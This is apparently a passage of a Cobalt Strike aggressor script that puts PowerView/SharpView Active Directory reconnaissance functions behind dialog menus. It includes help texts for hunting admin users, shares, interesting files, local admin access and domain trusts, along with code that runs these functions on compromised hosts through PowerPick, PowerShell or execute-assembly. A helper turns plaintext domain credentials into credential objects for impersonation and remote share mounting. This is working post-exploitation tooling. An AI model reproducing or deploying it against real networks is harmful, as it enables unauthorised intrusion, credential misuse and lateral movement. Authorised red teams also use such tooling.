    ComputerName: Specifies an array of one or more hosts to enumerate, passable on the pipeline.
    Domain: Specifies the domain to query for computers AND users, defaults to the current domain.
    ComputerDomain: Specifies the domain to query for computers, defaults to the current domain.
    ComputerLDAPFilter: Specifies an LDAP query string that is used to search for computer objects.
    ComputerSearchBase: Specifies the LDAP source to search through for computers,
    ComputerUnconstrained: Switch. Search computer objects that have unconstrained delegation.
    ComputerOperatingSystem: Search computers with a specific operating system, wildcards accepted.
    ComputerServicePack: Search computers with a specific service pack, wildcards accepted.
    ComputerSiteName: Search computers in the specific AD Site name, wildcards accepted.
    ProcessName: Search for processes with one or more specific names.
    UserIdentity: Specifies one or more user identities to search for.
    UserDomain: Specifies the domain to query for users to search for, defaults to the current domain.
    UserLDAPFilter: Specifies an LDAP query string that is used to search for target users.
    UserSearchBase: Specifies the LDAP source to search through for target users.
    UserGroupIdentity: Specifies a group identity to query for target users, defaults to 'Domain Admins.
    UserAdminCount: Switch. Search for users users with '(adminCount=1)' (meaning are/were privileged).
    Server: Specifies an Active Directory server (domain controller) to bind to.
    SearchScope: Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    Tombstone: Switch. Specifies that the searcher should also return deleted/tombstoned objects.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials
    StopOnSuccess: Switch. Stop hunting after finding after finding a target user.
    Delay: Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
    Jitter: Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
    Threads: The number of threads to use for user searching, defaults to 20.");
}

sub helpfinddomainuserevent {
    show_message("
Function:
    Find-DomainUserEvent 

Description:
    Enumerates all domain controllers from the specified -Domain
    (default of the local domain) using Get-DomainController, enumerates
    the logon events for each using Get-DomainUserEvent, and filters
    the results based on the targeting criteria.

Parameters:
    ComputerName: Specifies an explicit computer name to retrieve events from.
    Domain: Specifies a domain to query for domain controllers to enumerate.
    Filter: A hashtable of PowerView.LogonEvent properties to filter for.
    StartTime: The [DateTime] object representing the start of when to collect events.
    EndTime: The [DateTime] object representing the end of when to collect events.
    MaxEvents: The maximum number of events (per host) to retrieve. Default of 5000.
    UserIdentity: Specifies one or more user identities to search for.
    UserDomain: Specifies the domain to query for users to search for, defaults to the current domain.
    UserLDAPFilter: Specifies an LDAP query string that is used to search for target users.
    UserSearchBase: Specifies the LDAP source to search through for target users.
    UserGroupIdentity: Specifies a group identity to query for target users, defaults to 'Domain Admins.
    UserAdminCount: Switch. Search for users users with '(adminCount=1)' (meaning are/were privileged).
    Server: Specifies an Active Directory server (domain controller) to bind to.
    SearchScope: Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    Tombstone: Switch. Specifies that the searcher should also return deleted/tombstoned objects.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials
    StopOnSuccess: Switch. Stop hunting after finding after finding a target user.
    Delay: Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
    Jitter: Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
    Threads: The number of threads to use for user searching, defaults to 20.");
}

sub helpfinddomainshare {
    show_message("
Function:
    Find-DomainShare 

Description:
    This function enumerates all machines on the current (or specified) domain
    using Get-DomainComputer, and enumerates the available shares for each
    machine with Get-NetShare. If -CheckShareAccess is passed, then
    [IO.Directory]::GetFiles() is used to check if the current user has read
    access to the given share. If -Credential is passed, then
    Invoke-UserImpersonation is used to impersonate the specified user before
    enumeration, reverting after with Invoke-RevertToSelf.

Parameters:
    ComputerName: Specifies an array of one or more hosts to enumerate, passable on the pipeline.
    ComputerDomain: Specifies the domain to query for computers, defaults to the current domain.
    ComputerLDAPFilter: Specifies an LDAP query string that is used to search for computer objects.
    ComputerSearchBase: Specifies the LDAP source to search through for computers,
    ComputerOperatingSystem: Search computers with a specific operating system, wildcards accepted.
    ComputerServicePack: Search computers with a specific service pack, wildcards accepted.
    ComputerSiteName: Search computers in the specific AD Site name, wildcards accepted.
    CheckShareAccess: Switch. Only display found shares that the local user has access to.
    Server: Specifies an Active Directory server (domain controller) to bind to.
    SearchScope: Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    Tombstone: Switch. Specifies that the searcher should also return deleted/tombstoned objects.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials
    Delay: Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
    Jitter: Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
    Threads: The number of threads to use for user searching, defaults to 20.");
}

sub helpfindinterestingdomainsharefile {
    show_message("
Function:
    Find-InterestingDomainShareFile 

Description:
    This function enumerates all machines on the current (or specified) domain
    using Get-DomainComputer, and enumerates the available shares for each
    machine with Get-NetShare. It will then use Find-InterestingFile on each
    readhable share, searching for files marching specific criteria. If -Credential
    is passed, then Invoke-UserImpersonation is used to impersonate the specified
    user before enumeration, reverting after with Invoke-RevertToSelf.

Parameters:
    ComputerName: Specifies an array of one or more hosts to enumerate, passable on the pipeline.
    ComputerDomain: Specifies the domain to query for computers, defaults to the current domain.
    ComputerLDAPFilter: Specifies an LDAP query string that is used to search for computer objects.
    ComputerSearchBase: Specifies the LDAP source to search through for computers,
    ComputerOperatingSystem: Search computers with a specific operating system, wildcards accepted.
    ComputerServicePack: Search computers with a specific service pack, wildcards accepted.
    ComputerSiteName: Search computers in the specific AD Site name, wildcards accepted.
    Include: Only return files/folders that match the specified array of strings,
    SharePath: Specifies one or more specific share paths to search, in the form \\\\COMPUTER\\Share
    ExcludedShares: Specifies share paths to exclude, default of C\$, Admin\$, Print\$, IPC\$.
    LastAccessTime: Only return files with a LastAccessTime greater than this date value.
    LastWriteTime: Only return files with a LastWriteTime greater than this date value.
    CreationTime: Only return files with a CreationTime greater than this date value.
    OfficeDocs: Switch. Search for office documents (*.doc*, *.xls*, *.ppt*)
    FreshEXEs: Switch. Find .EXEs accessed within the last 7 days.
    Server: Specifies an Active Directory server (domain controller) to bind to.
    SearchScope: Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    Tombstone: Switch. Specifies that the searcher should also return deleted/tombstoned objects.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials
    Delay: Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
    Jitter: Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
    Threads: The number of threads to use for user searching, defaults to 20.");
}

sub helpfindlocaladminaccess {
    show_message("
Function:
    Find-LocalAdminAccess 

Description:
    This function enumerates all machines on the current (or specified) domain
    using Get-DomainComputer, and for each computer it checks if the current user
    has local administrator access using Test-AdminAccess. If -Credential is passed,
    then Invoke-UserImpersonation is used to impersonate the specified user
    before enumeration, reverting after with Invoke-RevertToSelf.

Parameters:
    ComputerName: Specifies an array of one or more hosts to enumerate, passable on the pipeline.
    ComputerDomain: Specifies the domain to query for computers, defaults to the current domain.
    ComputerLDAPFilter: Specifies an LDAP query string that is used to search for computer objects.
    ComputerSearchBase: Specifies the LDAP source to search through for computers,
    ComputerOperatingSystem: Search computers with a specific operating system, wildcards accepted.
    ComputerServicePack: Search computers with a specific service pack, wildcards accepted.
    ComputerSiteName: Search computers in the specific AD Site name, wildcards accepted.
    CheckShareAccess: Switch. Only display found shares that the local user has access to.
    Server: Specifies an Active Directory server (domain controller) to bind to.
    SearchScope: Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    Tombstone: Switch. Specifies that the searcher should also return deleted/tombstoned objects.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials
    Delay: Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
    Jitter: Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
    Threads: The number of threads to use for user searching, defaults to 20.");
}

sub helpfinddomainlocalgroupmember {
    show_message("
Function:
    Find-DomainLocalGroupMember 

Description:
    This function enumerates all machines on the current (or specified) domain
    using Get-DomainComputer, and enumerates the members of the specified local
    group (default of Administrators) for each machine using Get-NetLocalGroupMember.
    By default, the API method is used, but this can be modified with '-Method winnt'
    to use the WinNT service provider.

Parameters:
    ComputerName: Specifies an array of one or more hosts to enumerate, passable on the pipeline.
    ComputerDomain: Specifies the domain to query for computers, defaults to the current domain.
    ComputerLDAPFilter: Specifies an LDAP query string that is used to search for computer objects.
    ComputerSearchBase: Specifies the LDAP source to search through for computers,
    ComputerOperatingSystem: Search computers with a specific operating system, wildcards accepted.
    ComputerServicePack: Search computers with a specific service pack, wildcards accepted.
    ComputerSiteName: Search computers in the specific AD Site name, wildcards accepted.
    GroupName: The local group name to query for users. If not given, it defaults to 'Administrators'.
    Method: The collection method to use, defaults to 'API', also accepts 'WinNT'.
    Server: Specifies an Active Directory server (domain controller) to bind to.
    SearchScope: Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    Tombstone: Switch. Specifies that the searcher should also return deleted/tombstoned objects.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials
    Delay: Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
    Jitter: Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
    Threads: The number of threads to use for user searching, defaults to 20.");
}

sub helpgetdomaintrust {
    show_message("
Function:
    Get-DomainTrust 

Description:
    This function will enumerate domain trust relationships for the current (or a remote)
    domain using a number of methods. By default, and LDAP search using the filter
    '(objectClass=trustedDomain)' is used- if any LDAP-appropriate parameters are specified
    LDAP is used as well. If the -NET flag is specified, the .NET method
    GetAllTrustRelationships() is used on the System.DirectoryServices.ActiveDirectory.Domain
    object. If the -API flag is specified, the Win32 API DsEnumerateDomainTrusts() call is
    used to enumerate instead.

Parameters:
    Domain: Specifies the domain to query for trusts, defaults to the current domain.
    API: Switch. Use an API call (DsEnumerateDomainTrusts) to enumerate the trusts instead of the built-in
    NET: Switch. Use .NET queries to enumerate trusts instead of the default LDAP method.
    LDAPFilter: Specifies an LDAP query string that is used to filter Active Directory objects.
    Properties: Specifies the properties of the output object to retrieve from the server.
    SearchBase: The LDAP source to search through, e.g. 'LDAP://OU=secret,DC=testlab,DC=local'
    Server: Specifies an Active Directory server (domain controller) to bind to.
    SearchScope: Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    Tombstone: Switch. Specifies that the searcher should also return deleted/tombstoned objects.
    FindOne: Only return one result object.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetforesttrust {
    show_message("
Function:
    Get-ForestTrust 

Description:
    This function will enumerate domain trust relationships for the current (or a remote)
    forest using number of method using the .NET method GetAllTrustRelationships() on a
    System.DirectoryServices.ActiveDirectory.Forest returned by Get-Forest.

Parameters:
    Forest: Specifies the forest to query for trusts, defaults to the current forest.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetdomainforeignuser {
    show_message("
Function:
    Get-DomainForeignUser 

Description:
    Uses Get-DomainUser to enumerate all users for the current (or target) domain,
    then calculates the given user's domain name based on the user's distinguishedName.
    This domain name is compared to the queried domain, and the user object is
    output if they differ.

Parameters:
    Domain: Specifies the domain to use for the query, defaults to the current domain.
    LDAPFilter: Specifies an LDAP query string that is used to filter Active Directory objects.
    Properties: Specifies the properties of the output object to retrieve from the server.
    SearchBase: The LDAP source to search through, e.g. 'LDAP://OU=secret,DC=testlab,DC=local'
    Server: Specifies an Active Directory server (domain controller) to bind to.
    SearchScope: Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    SecurityMasks: Specifies an option for examining security information of a directory object.
    Tombstone: Switch. Specifies that the searcher should also return deleted/tombstoned objects.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetdomainforeigngroupmember {
    show_message("
Function:
    Get-DomainForeignGroupMember 

Description:
    Uses Get-DomainGroup to enumerate all groups for the current (or target) domain,
    then enumerates the members of each group, and compares the member's domain
    name to the parent group's domain name, outputting the member if the domains differ.

Parameters:
    Domain: Specifies the domain to use for the query, defaults to the current domain.
    LDAPFilter: Specifies an LDAP query string that is used to filter Active Directory objects.
    Properties: Specifies the properties of the output object to retrieve from the server.
    SearchBase: The LDAP source to search through, e.g. 'LDAP://OU=secret,DC=testlab,DC=local'
    Server: Specifies an Active Directory server (domain controller) to bind to.
    SearchScope: Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    SecurityMasks: Specifies an option for examining security information of a directory object.
    Tombstone: Switch. Specifies that the searcher should also return deleted/tombstoned objects.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetdomaintrustmapping {
    show_message("
Function:
    Get-DomainTrustMapping 

Description:
    This function will enumerate domain trust relationships for the current domain using
    a number of methods, and then enumerates all trusts for each found domain, recursively
    mapping all reachable trust relationships. By default, and LDAP search using the filter
    '(objectClass=trustedDomain)' is used- if any LDAP-appropriate parameters are specified
    LDAP is used as well. If the -NET flag is specified, the .NET method
    GetAllTrustRelationships() is used on the System.DirectoryServices.ActiveDirectory.Domain
    object. If the -API flag is specified, the Win32 API DsEnumerateDomainTrusts() call is
    used to enumerate instead.

Parameters:
    API: Switch. Use an API call (DsEnumerateDomainTrusts) to enumerate the trusts instead of the
    NET: Switch. Use .NET queries to enumerate trusts instead of the default LDAP method.
    LDAPFilter: Specifies an LDAP query string that is used to filter Active Directory objects.
    Properties: Specifies the properties of the output object to retrieve from the server.
    SearchBase: The LDAP source to search through, e.g. 'LDAP://OU=secret,DC=testlab,DC=local'
    Server: Specifies an Active Directory server (domain controller) to bind to.
    SearchScope: Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    Tombstone: Switch. Specifies that the searcher should also return deleted/tombstoned objects.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

#-----------------
#Credential Object
#-----------------
sub createcredentialobject{
    local('$domain $user $password');
    #For now the credential format is Domain\Username Password
    #May offer the ability to parse other formats in the future
    ($domain, $usps) = split("\\\\", $3);
    ($user, $password) = split(" ", $usps);
    if($2 eq "PowerPick" || $2 eq "PowerShell"){
        $creds = '$PSPassword = ConvertTo-SecureString "';
        $creds .= $password;
        $creds .= '" -AsPlainText -Force; $Credential = New-Object System.Management.Automation.PSCredential("';
        $creds .= $domain;
        $creds .= '\\';
        $creds .= $user;
        $creds .= '",$PSPassword); ';
        return $creds;
    }
    else if($2 eq "Execute-Assembly"){
        $creds = $user;
        $creds .= "@";
        $creds .= $domain;
        $creds .= "/";
        $creds .= $password;
        return $creds;
    }
}

#If you need to change the location of the SharpView assembly
$sharviewlocation = "/SharpView.exe";

#---------------
#Misc Functions
#---------------
sub exportpowerviewcsv{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Export-PowerViewCSV", %(execmethod => "PowerPick", InputObject => "", Path => "", Delimeter => "", Append => ""), lambda({
        if ($2 eq  'Help'){
            helpexportpowerviewcsv()
            break;
        }
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }           
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Export-PowerViewCSV via PowerPick');
            bpowerpick($bid, 'Export-PowerViewCSV'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Export-PowerViewCSV via PowerShell');
            bpowershell($bid, 'Export-PowerViewCSV'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Export-PowerViewCSV via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Export-PowerViewCSV'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Converts objects into a series of comma-separated (CSV) strings and saves the strings in a CSV file in a thread-safe manner.");
    drow_text($dialog, 'InputObject', 'InputObject');
    drow_text($dialog, 'Path', 'Path');
    drow_text($dialog, 'Delimiter', 'Delimiter');
    drow_text($dialog, 'Append', 'Append');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub resolveipaddress{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Resolve-IPAddress", %(execmethod => "PowerPick", ComputerName => ""), lambda({
        if ($2 eq 'Help'){
            helpresolveipaddress()
            break;
        }
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Resolve-IPAddress via PowerPick');
            bpowerpick($bid, 'Resolve-IPAddress'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Resolve-IPAddress via PowerShell');
            bpowershell($bid, 'Resolve-IPAddress'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Resolve-IPAddress via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Resolve-IPAddress'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Resolves a given hostename to its associated IPv4 address");
    drow_text($dialog, "ComputerName",  "ComputerName");
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub converttosid{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 ConvertTo-SID", %(execmethod => "PowerPick", ObjectName => "", Domain => "", Server => "", Credential => ""), lambda({
        if ($2 eq 'Help'){
            helpconverttosid()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView ConvertTo-SID via PowerPick');
            bpowerpick($bid, ''.$creds.'ConvertTo-SID'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView ConvertTo-SID via PowerShell');
            bpowershell($bid, ''.$creds.'ConvertTo-SID'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView ConvertTo-SID via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'ConvertTo-SID'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Converts a given user/group name to a security identifier (SID)");
    drow_text($dialog, 'ObjectName', 'ObjectName');
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'Credential', 'Credential');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub convertadname{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Convert-ADName", %(execmethod => "PowerPick", Identity => "", OutputType => "", Domain => "", Server => "", Credential => ""), lambda({
        if ($2 eq 'Help'){
            helpconvertadname()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Convert-ADName via PowerPick');
            bpowerpick($bid, ''.$creds.'Convert-ADName'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Convert-ADName via PowerShell');
            bpowershell($bid, ''.$creds.'Convert-ADName'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Convert-ADName via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Convert-ADName'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Converts Active Directory object names between a variety of formats");
    drow_text($dialog, 'Identity', 'Identity');
    drow_text($dialog, 'OutputType', 'OutputType');
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'Credential', 'Credential');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub convertfromuacvalue{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 ConvertFrom-UACValue", %(execmethod => "PowerPick", Value => "", ShowAll => "false"), lambda({
        if ($2 eq 'Help'){
            helpconvertfromuacvalue()
            break;
        }
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView ConvertFrom-UACValue via PowerPick');
            bpowerpick($bid, 'ConvertFrom-UACValue'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView ConvertFrom-UACValue via PowerShell');
            bpowershell($bid, 'ConvertFrom-UACValue'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView ConvertFrom-UACValue via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'ConvertFrom-UACValue'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Converts a UAC int value to human readable form");
    drow_text($dialog, 'Value', 'Value');
    drow_checkbox($dialog, 'ShowAll', 'ShowAll');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub addremoteconnection{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Add-RemoteConnection", %(execmethod => "PowerPick", ComputerName => "", Path => "", Credential => ""), lambda({
        if ($2 eq 'Help'){
            helpaddremoteconnection()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Add-RemoteConnection via PowerPick');
            bpowerpick($bid, ''.$creds.'Add-RemoteConnection'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Add-RemoteConnection via PowerShell');
            bpowershell($bid, ''.$creds.'Add-RemoteConnection'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Add-RemoteConnection via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Add-RemoteConnection'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Pseudo 'mounts' a connection to a remote path using the specified credential object, allowing for access of remote resources. If a -Path isn't specified, a -ComputerName is required to pseudo-mount IPC\$    ");
    drow_text($dialog, 'ComputerName', 'ComputerName');
    drow_text($dialog, 'Path', 'Path');
    drow_text($dialog, 'Credential', 'Credential');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub removeremoteconnection{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Remove-RemoteConnection", %(execmethod => "PowerPick", ComputerName => "", Path => ""), lambda({
        if ($2 eq 'Help'){
            helpremoveremoteconnection()
            break;
        }
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Remove-RemoteConnection via PowerPick');
            bpowerpick($bid, 'Remove-RemoteConnection'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Remove-RemoteConnection via PowerShell');
            bpowershell($bid, 'Remove-RemoteConnection'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Remove-RemoteConnection via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Remove-RemoteConnection'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Destroys a connection created by New-RemoteConnection");
    drow_text($dialog, 'ComputerName', 'ComputerName');
    drow_text($dialog, 'Path', 'Path');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub invokeuserimpersonation{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Invoke-UserImpersonation", %(execmethod => "PowerPick", Credential => "", TokenHandle => "", Quiet => ""), lambda({
        if ($2 eq  'Help'){
            helpinvokeuserimpersonation()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
